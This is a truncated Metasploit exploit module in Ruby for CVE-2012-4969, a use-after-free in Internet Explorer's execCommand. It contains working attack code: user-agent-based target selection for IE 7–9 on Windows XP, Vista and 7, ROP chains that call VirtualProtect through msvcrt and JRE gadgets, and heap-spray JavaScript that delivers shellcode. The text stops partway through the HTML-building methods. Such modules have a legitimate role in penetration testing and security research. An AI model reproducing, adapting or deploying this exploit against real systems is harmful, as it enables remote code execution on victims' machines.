## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "7.0", :ua_maxver => "9.0", :javascript => true, :rank => GoodRanking }) def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer execCommand Use-After-Free Vulnerability ", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it. This module requires the following dependencies on the target for the ROP chain to function. For WinXP SP3 with IE8, msvcrt must be present (which it is on default installs). For Vista/Win7 with IE8 or Win7 with IE9, jre 1.6.x or below must be installed. }, 'License' => MSF_LICENSE, 'Author' => [ 'unknown', # Some secret ninja 'eromang', # First public discovery 'binjo', 'sinn3r', # Metasploit 'juan vazquez' # Metasploit ], 'References' => [ [ 'CVE', '2012-4969' ], [ 'OSVDB', '85532' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2757760' ], [ 'URL', 'http://eromang.zataz.com/2012/09/16/zero-day-season-is-really-not-over-yet/' ], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/09/17/ie-execcommand-fuction-use-after-free-vulnerability-0day/'], [ 'URL', 'http://metasploit.com' ] ], 'Payload' => { 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'ExitFunction' => "none", 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Random' => false } ], [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5fa', 'Random' => false } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Random' => false } ], [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fc', 'Random' => true } ] ], 'Privileged' => false, 'DisclosureDate' => "Sep 14 2012", # When it was spotted in the wild by eromang 'DefaultTarget' => 0)) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[1] #IE 7 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[2] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[3] #IE 7 on Windows Vista elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/ return targets[4] #IE 8 on Windows Vista elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/ return targets[5] #IE 8 on Windows 7 elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/ return targets[6] #IE 9 on Windows 7 else return nil end end def junk(n=4) return rand_text_alpha(n).unpack("V")[0].to_i end def nop return make_nops(4).unpack("V")[0].to_i end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") exec_size = code.length stack_pivot = [ 0x77c4e393, # RETN 0x77c4e392, # POP EAX # RETN 0x77c15ed5, # XCHG EAX, ESP # RETN ].pack("V*") rop = [ 0x77C21891, # POP ESI # RETN 0x0c0c0c04, # ESI 0x77c4e392, # POP EAX # RETN 0x77c11120, # <- *&VirtualProtect() 0x77c2e493, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN junk, 0x77c2dd6c, # XCHG EAX,ESI # ADD [EAX], AL # RETN 0x77c4ec00, # POP EBP # RETN 0x77c35459, # ptr to 'push esp # ret' 0x77c47705, # POP EBX # RETN exec_size, # EBX 0x77c3ea01, # POP ECX # RETN 0x77c5d000, # W pointer (lpOldProtect) (-> ecx) 0x77c46100, # POP EDI # RETN 0x77c46101, # ROP NOP (-> edi) 0x77c4d680, # POP EDX # RETN 0x00000040, # newProtect (0x40) (-> edx) 0x77c4e392, # POP EAX # RETN nop, # NOPS (-> eax) 0x77c12df9, # PUSHAD # RETN ].pack("V*") when :jre print_status("Using JRE ROP") exec_size = 0xffffffff - code.length + 1 if t['Random'] stack_pivot = [ 0x0c0c0c0c, # 0c0c0c08 0x7c347f98, # RETN 0x7c347f97, # POP EDX # RETN 0x7c348b05 # XCHG EAX, ESP # RET ].pack("V*") else stack_pivot = [ 0x7c347f98, # RETN 0x7c347f97, # POP EDX # RETN 0x7c348b05 # XCHG EAX, ESP # RET ].pack("V*") end rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN exec_size, # Value to negate, will become 0x00000201 (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c351e05, # NEG EAX # RETN 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0xffffffc0, # Value to negate, will become 0x00000040 0x7c351eb1, # NEG EDX # RETN 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end code = stack_pivot + rop + code return code end # Spray published by corelanc0d3r # Exploit writing tutorial part 11 : Heap Spraying Demystified # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/ def get_random_spray(t, js_code, js_nops) spray = <<-JS function randomblock(blocksize) { var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock; } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x10000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset_length = #{t['Offset']}; for (var i=0; i < 0x1000; i++) { var padding = unescape(tounescape(randomblock(0x1000))); while (padding.length < 0x1000) padding+= padding; var junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } JS return spray end def get_spray(t, js_code, js_nops) js = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{t['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); JS end def load_html1(cli, my_target) p = get_payload(my_target, cli) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js_r_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) if my_target['Random'] js = get_random_spray(my_target, js_code, js_r_nops) else js = get_spray(my_target, js_code, js_nops) end js = heaplib(js, {:noobfu => true}) html = <<-EOS
EOS return html end def load_html2 html = %Q|